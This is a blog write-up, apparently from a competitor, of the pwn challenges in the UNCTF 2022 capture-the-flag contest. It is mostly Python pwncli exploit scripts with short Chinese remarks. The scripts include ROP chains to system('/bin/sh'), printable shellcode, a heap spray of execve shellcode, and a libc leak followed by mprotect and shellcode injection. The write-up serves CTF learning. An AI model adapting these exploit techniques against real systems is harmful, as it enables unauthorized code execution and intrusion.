unctf-2022-pwn-all

unctf2022_pwn_all_wp

welcomeUNCTF2022

 sl("UNCTF&2022")

石头剪刀布

预测随机数

#!/usr/bin/env python3

'''
Author: 7resp4ss
Date: 2022-11-13 02:17:09
LastEditTime: 2022-11-13 02:20:30
Description: 
'''

from pwncli import *
from ctypes import *
cli_script()

io = gift["io"]
elf = gift["elf"]
libc = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

dll = cdll.LoadLibrary("libc.so.6")
seed = dll.srand(0xa)

sla('Will you learn about something of pwn later?(y/n)','y')

for i in range(100):
    rand = str((dll.rand()%3+2)%3)
    sla("round",rand)



io.interactive()

Move your heart

#!/usr/bin/env python3

'''
Author: 7resp4ss
Date: 2022-11-12 20:28:27
LastEditTime: 2022-11-12 20:39:59
Description: 
'''

from pwncli import *

cli_script()

io = gift["io"]
elf = gift["elf"]
libc = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

pd = 0x110dfc17
sla("num:",str(pd))
ru("gift:")
leak_addr = int(rl(),16)
log_address_ex2(leak_addr)

pop_rdi_addr = 0x00000000004013d3

pd = flat(
    {
    0:[
        pop_rdi_addr,
        leak_addr+0x18,
        elf.plt.system,
        '/bin/sh\x00',  #here offset is 0x18
    ],
    0x20:leak_addr-8,
    0x28:[
        0x4012D6
    ]
    }
)

sl(pd)

io.interactive()

int_0x80

可见字符shellcode

#!/usr/bin/env python3

'''
Author: 7resp4ss
Date: 2022-11-13 14:47:30
LastEditTime: 2022-11-13 15:00:13
Description: 
'''

from pwncli import *

cli_script()

io = gift["io"]
elf = gift["elf"]
libc = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

ShellcodeMall
sc = b'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'
'''gdb.attach(io,'b *$rebase(0x13AB)')
sleep(2)'''
sl(sc)


io.interactive()

fakehero

hunk有可执行权限,而且申请的chunk指针存储在栈上,直接喷射chunk指针到栈就完事了

#!/usr/bin/env python3

'''
Author: 7resp4ss
Date: 2022-11-13 02:22:57
LastEditTime: 2022-11-13 02:55:53
Description: 
'''

from pwncli import *

cli_script()

io = gift["io"]
elf = gift["elf"]
libc = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

def cmd(idx):
    sla('> ',str(idx))

def add(idx,size,cont):
    cmd(1)
    sla('index: \n',str(idx))
    sla('Size: \n',str(size))
    sla('Content: \n',cont)

def free(idx):
    cmd(2)
    sla('Index: \n',str(idx))

sc = flat(
    {
        0:ShellcodeMall.amd64.execve_bin_sh,
        27:ShellcodeMall.amd64.execve_bin_sh,
        0x100:''
    }
)

for i in range(64):
    add(i,0x100,sc)

cmd(3)


io.interactive()

checkin

给内存错误信号设置了个得到flag的函数,我们只要拉起信号即可。

但是呃呃题目的flag头不是UNCTF,搞得我以为有2个flag文件。

用了用mprotect然后ret2shellcode扫了扫目录,发生就是flag.txt,然后去拷打客服得知是出题人呃呃flag头搞错了

docker里好像把dash删除了,拿不到shell

#!/usr/bin/env python3

'''
Author: 7resp4ss
Date: 2022-11-13 14:43:43
LastEditTime: 2022-11-13 16:33:47
Description: 
'''

from pwncli import *

cli_script()

io = gift["io"]
elf = gift["elf"]
libc = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug


sl('name')

sla('size',' -65535')

pop_rdi_addr = 0x0000000000400a53

pd = flat(
    {
        0x58:[
            pop_rdi_addr,
            elf.got.puts,
            elf.plt.puts,
            0x400938
        ]
    }
)
sl(pd)

lb = recv_current_libc_addr(0x06f6a0)
log_address_ex2(lb)

sys_addr = lb + 0x0453a0
binsh = lb + 0x18ce57
'''
$ one_gadget libc6_2.23-0ubuntu11.3_amd64.so                            
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

'''

sl('name')

sla('size',' -65535')

bss_addr = 0x000000000601080

pop_rdi_addr = 0x0000000000400a53
pop_rdx_rsi_addr = lb + 0x00000000001151c9

pd = flat(
    {
        0x58:[
            pop_rdi_addr,
            0x400000,
            pop_rdx_rsi_addr,
            7,
            0x4000,
            lb + 0x0000000000101870, #mprotect

            pop_rdi_addr,
            0,
            pop_rdx_rsi_addr,
            0x100,
            0x400000,
            elf.plt.read,    #read shellcode


            0x400000,

        ]
    }
)
sl(pd)

sleep(2)

sc = asm(shellcraft.cat("flag.txt"))
sl(sc)

io.interactive()
posted @ 2022-11-21 21:36  7resp4ss  阅读(90)  评论(2编辑  收藏  举报